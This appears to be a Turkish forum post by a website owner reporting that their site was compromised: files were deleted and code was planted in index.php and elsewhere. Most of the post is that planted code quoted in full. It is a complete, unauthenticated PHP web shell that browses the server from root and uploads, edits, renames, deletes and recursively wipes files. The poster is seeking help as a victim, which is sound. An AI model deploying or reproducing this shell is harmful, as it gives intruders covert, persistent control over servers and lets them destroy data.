Sitenin belli başlı dosyaları silinmiş
şöyle bir dosya oluşmuş index'te
index.php içi bu şekilde olmuş
ayrıca sitenin bir çok yerine bu kod entegre edilmiş
<?php @error_reporting(0); @ini_set('session.gc_maxlifetime', 53200); @ini_set('session.cookie_lifetime', 53200); @session_start(); if(!isset($_SESSION['colan']))$_SESSION['colan']=[]; define('RO','/'); $lockka=$_GET['kip']??''; $blikka=$_GET['vex']??''; function mixar($str){ return md5($str); } function putka($key,$val){ $_SESSION['colan'][$key]=$val; } function getka($key){ return $_SESSION['colan'][$key]??null; } function jumpka($path,$msg=''){ $hash=mixar($path); putka($hash,$path); $url='?kip='.$hash.($msg?'&vex='.$msg:''); header("Location: $url"); exit; } function fixka($raw){ if(empty($raw))return getcwd(); $raw=str_replace("\0",'',$raw); $raw=trim($raw); if($raw[0]==='/'){ $path=$raw; }else{ $path=getcwd().DIRECTORY_SEPARATOR.$raw; } $parts=explode(DIRECTORY_SEPARATOR,$path); $normalized=[]; foreach($parts as $part){ if($part==='' or $part==='.')continue; if($part==='..'){ if(count($normalized)>0)array_pop($normalized); continue; } $normalized[]=$part; } $result='/'.implode('/',$normalized); $real=@realpath($result); if($real)return $real; if(@is_dir($result))return rtrim($result,'/'); $parent=dirname($result); if(@is_dir($parent))return $parent; return getcwd(); } function reaka($path){ $handle=@fopen($path,'rb'); if(!$handle)return ''; $content=''; while(!feof($handle)){ $content.=fread($handle,8192); } fclose($handle); return $content; } function wrika($path,$data){ $handle=@fopen($path,'wb'); if(!$handle)return false; fwrite($handle,$data); fclose($handle); return true; } function wipka($dir){ if(!is_dir($dir))return; $items=scandir($dir); foreach($items as $i){ if($i==='.')continue; if($i==='..')continue; $path=$dir.DIRECTORY_SEPARATOR.$i; if(is_dir($path)){ wipka($path); }else{ @unlink($path); } } @rmdir($dir); } $herka=$lockka?fixka(getka($lockka)??getcwd()):getcwd(); if(!$herka or !is_dir($herka))$herka=getcwd(); if($_SERVER['REQUEST_METHOD']==='POST'){ $doka=$_POST['doka']??''; if($doka==='senda'){ if(isset($_FILES['bloka'])){ $tmp=$_FILES['bloka']['tmp_name']; $namka=basename($_FILES['bloka']['name']); if(is_uploaded_file($tmp)){ move_uploaded_file($tmp,$herka.DIRECTORY_SEPARATOR.$namka); jumpka($herka,'u'); } } } if($doka==='wrapa'){ $namka=basename($_POST['titka']??''); $textka=$_POST['bodka']??''; if($namka){ wrika($herka.DIRECTORY_SEPARATOR.$namka,$textka); jumpka($herka,'c'); } } if($doka==='makka'){ $namka=basename($_POST['titka']??''); if($namka){ @mkdir($herka.DIRECTORY_SEPARATOR.$namka,0755); jumpka($herka,'d'); } } if($doka==='modka'){ $filka=$herka.DIRECTORY_SEPARATOR.basename($_POST['whoka']??''); $textka=$_POST['bodka']??''; if(is_file($filka)){ wrika($filka,$textka); jumpka($herka,'s'); }else{ jumpka($herka,'e'); } } if($doka==='shiftka'){ $oldka=$herka.DIRECTORY_SEPARATOR.basename($_POST['fromka']??''); $newka=$herka.DIRECTORY_SEPARATOR.basename($_POST['intoka']??''); if(file_exists($oldka)){ @rename($oldka,$newka); jumpka($herka,'r'); }else{ jumpka($herka,'e'); } } if($doka==='killka'){ $thingka=$herka.DIRECTORY_SEPARATOR.basename($_POST['whoka']??''); if(is_file($thingka)){ @unlink($thingka); jumpka($herka,'x'); }elseif(is_dir($thingka)){ wipka($thingka); jumpka($herka,'x'); }else{ jumpka($herka,'e'); } } } $msgka=['u'=>'Sendar komplet','c'=>'Dokka kreated','d'=>'Foldar builded','s'=>'Changez saved','r'=>'Namez shifted','x'=>'Itemka wiped','e'=>'Operationz failed']; $blimka=$blikka?($msgka[$blikka]??''):''; $editka=$_GET['opka']??''; ?> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Filer</title> <style> body{margin:0;font:13px monospace;background:#1a1a1a;color:#eee} .topka{background:#2a2a2a;padding:15px;border-bottom:3px solid #3a3a3a} .topka h3{margin:0 0 5px;color:#4a9eff;font-size:18px} .pathka{color:#888;font-size:11px} .pathka a{color:#6ae;text-decoration:none;margin:0 4px} .pathka a:hover{text-decoration:underline} .msgka{background:#2d5;color:#fff;padding:10px 15px;margin:10px;border-radius:4px;font-size:12px} .zona{display:flex;flex-wrap:wrap;gap:15px;padding:15px} .boxka{background:#2a2a2a;border:1px solid #3a3a3a;border-radius:6px;padding:15px;flex:1;min-width:280px} .boxka h4{color:#6ae;margin:0 0 12px;font-size:14px;border-bottom:1px solid #3a3a3a;padding-bottom:6px} input,textarea{width:100%;padding:8px;background:#1a1a1a;border:1px solid #3a3a3a;color:#eee;margin:6px 0;border-radius:4px;font:12px monospace} input:focus,textarea:focus{outline:none;border-color:#4a9eff} textarea{min-height:80px;resize:vertical} .btnka{background:#4a9eff;color:#fff;border:none;padding:8px 16px;border-radius:4px;cursor:pointer;font:bold 11px sans-serif;margin-top:8px} .btnka:hover{background:#3a8eef} .listka{background:#2a2a2a;margin:10px;border-radius:6px;overflow:hidden} .rowka{display:flex;padding:10px 15px;border-bottom:1px solid #1a1a1a;align-items:center} .rowka:hover{background:#323232} .headka{background:#333;font-weight:bold;color:#6ae} .namka{flex:3;color:#eee} .namka a{color:#4a9eff;text-decoration:none} .namka a:hover{text-decoration:underline} .sizka,.perka,.timka{flex:1;color:#888;font-size:11px} .aktka{flex:2;display:flex;gap:6px;flex-wrap:wrap} .aktka form{display:inline} .aktka input[type=text]{width:90px;padding:4px;margin:0;font-size:10px} .aktka button{padding:4px 10px;font-size:10px;background:#555;border:none;color:#fff;border-radius:3px;cursor:pointer} .aktka button:hover{background:#666} .delbtn{background:#d44} .delbtn:hover{background:#c33} </style> </head> <body> <div class="topka"> <h3>Kanelka</h3> <div class="pathka"> Lama: <?php echo htmlspecialchars($herka)?><br> <?php $pathka=$herka; $segka=array_filter(explode('/',$pathka)); $roothash=mixar('/'); putka($roothash,'/'); echo '<a href="?kip='.$roothash.'">ROOT</a>'; $buildka=''; foreach($segka as $part){ $buildka.='/'.$part; $hash=mixar($buildka); putka($hash,$buildka); echo ' / <a href="?kip='.$hash.'">'.htmlspecialchars($part).'</a>'; } ?> </div> </div> <?php if($blimka):?> <div class="msgka"><?php echo htmlspecialchars($blimka)?></div> <?php endif;?> <div class="zona"> <div class="boxka"> <h4>Sendar Dokka</h4> <form method="post" enctype="multipart/form-data"> <input type="hidden" name="doka" value="senda"> <input type="file" name="bloka" required> <button type="submit" class="btnka">Sendar</button> </form> </div> <div class="boxka"> <h4>Kreatar Dokka</h4> <form method="post"> <input type="hidden" name="doka" value="wrapa"> <input type="text" name="titka" placeholder="namka.txt" required> <textarea name="bodka" placeholder="textka here..."></textarea> <button type="submit" class="btnka">Kreatar</button> </form> </div> <div class="boxka"> <h4>Buildar Foldar</h4> <form method="post"> <input type="hidden" name="doka" value="makka"> <input type="text" name="titka" placeholder="foldar namka" required> <button type="submit" class="btnka">Buildar</button> </form> </div> </div> <?php if($editka): $targka=$herka.DIRECTORY_SEPARATOR.basename($editka); $kontka=is_file($targka)?reaka($targka):'';?> <div class="boxka" style="margin:15px"> <h4>Modifar: <?php echo htmlspecialchars($editka)?></h4> <form method="post"> <input type="hidden" name="doka" value="modka"> <input type="hidden" name="whoka" value="<?php echo htmlspecialchars($editka)?>"> <textarea name="bodka" style="min-height:250px"><?php echo htmlspecialchars($kontka)?></textarea> <button type="submit" class="btnka">Savka</button> </form> </div> <?php endif;?> <div class="listka"> <div class="rowka headka"> <div class="namka">Namka</div> <div class="sizka">Sizka</div> <div class="perka">Modka</div> <div class="timka">Timka</div> <div class="aktka">Aktionz</div> </div> <?php $itemska=@scandir($herka); if($itemska){ foreach($itemska as $itka){ if($itka==='.')continue; if($itka==='..')continue; $fullka=$herka.DIRECTORY_SEPARATOR.$itka; $isdirka=is_dir($fullka); $sizka=$isdirka?'â':number_format(filesize($fullka)).' B'; $perka=substr(sprintf('%o',fileperms($fullka)),-4); $timka=date('M d H:i',filemtime($fullka)); echo '<div class="rowka">'; echo '<div class="namka">'; if($isdirka){ $nexthash=mixar($fullka); putka($nexthash,$fullka); echo '[DIR] <a href="?kip='.$nexthash.'">'.htmlspecialchars($itka).'</a>'; }else{ echo '[FILE] '.htmlspecialchars($itka); } echo '</div>'; echo '<div class="sizka">'.$sizka.'</div>'; echo '<div class="perka">'.$perka.'</div>'; echo '<div class="timka">'.$timka.'</div>'; echo '<div class="aktka">'; if(!$isdirka){ $curhash=mixar($herka); putka($curhash,$herka); echo '<a href="?kip='.$curhash.'&opka='.urlencode($itka).'"><button>Editar</button></a>'; } echo '<form method="post" onsubmit="return confirm(\'Deletar?\')"> <input type="hidden" name="doka" value="killka"> <input type="hidden" name="whoka" value="'.htmlspecialchars($itka).'"> <button type="submit" class="delbtn">Deletar</button> </form>'; echo '<form method="post"> <input type="hidden" name="doka" value="shiftka"> <input type="hidden" name="fromka" value="'.htmlspecialchars($itka).'"> <input type="text" name="intoka" placeholder="nunamka" required> <button type="submit">Shiftar</button> </form>'; echo '</div></div>'; } } ?> </div> </body> </html>